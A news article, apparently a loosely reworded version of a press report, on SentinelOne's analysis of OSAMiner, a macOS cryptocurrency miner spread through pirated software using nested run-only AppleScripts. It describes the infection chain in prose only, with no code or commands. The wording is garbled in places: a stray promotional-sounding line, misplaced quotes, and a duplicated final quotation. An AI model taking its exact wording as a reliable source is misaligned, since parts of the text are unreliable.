MacOS users have been the targets of a sophisticated malware operation for more than five years now. This software used a cunning approach to evade detection and secretly mined cryptocurrency using the hardware resources of infected users behind their backs.
According to a report that was published this week by the security firm SentinelOne, the malware, which goes by the name OSAMiner, has been distributed in the wild since at least 2015, and it does so by disguising itself as pirated versions of games and software like League of Legends and Microsoft Office for Mac.
A representative for SentinelOne told ZDNet in an email interview on Monday that OSAMiner has been operational for a significant amount of time and has progressed over the past few months.
The spokesman continued by saying, “From the data we have it appears to be largely focused at Chineses/Asia-Pacific populations.”
AppleScripts that are nested and run exclusively are the way to go!
However, the cryptocurrency miner did not remain completely undiscovered. According to SentinelOne, two Chinese security companies discovered and evaluated older versions of the OSAMiner in the months of August and September of 2018.
But according to Phil Stokes, a SentinelOne MacOS malware researcher, the reports just scraped the surface of what OSAMiner was capable of doing.
The key reason for this was because security researchers weren’t able to extract the malware’s whole code at the time. The malware employed nested run-only AppleScript files to retrieve its destructive code across successive phases, therefore they were unable to do so.
The booby-trapped installers would download and run a run-only AppleScript while customers installed the pirated software. This run-only AppleScript would then download and run a second run-only AppleScript, and then a third run-only AppleScript would be downloaded and performed as a final step.
Analysis was made more difficult for security researchers as a result of the fact that “run-only” AppleScript comes in a built state in which the source code is not readable by humans.
Stokes revealed the complete chain of this assault along with indicators of compromise (IOCs) of older and more recent OSAMiner attacks in his post that was published yesterday. Stokes and the rest of the SentinelOne team have high hopes that other MacOS security software providers will now be able to detect OSAMiner attacks and assist in protecting MacOS users as a result of their efforts to solve the mystery surrounding this campaign and publish indicators of compromise (IOCs).
“Run-only AppleScripts are fairly uncommon in the realm of MacOS malware, although this is likely due to the longevity of the MacOS as well as a lack of attention paid to it.
The OSAMiner effort, which has most certainly been going on for at least five years, is a perfect example of how effective run-only AppleScripts can be for evasion and anti-analysis “Yesterday, Stokes came to the conclusion in his study.
“In this case, we have not seen the actor use any of the more powerful features of AppleScript that we’ve discussed elsewhere [1, 2], but that is an attack vector that remains wide open and for which many defensive tools are not equipped to handle.” [Case] “We have not seen the actor use any of the more powerful features of AppleScript that we’ve discussed elsewhere [1, 2].”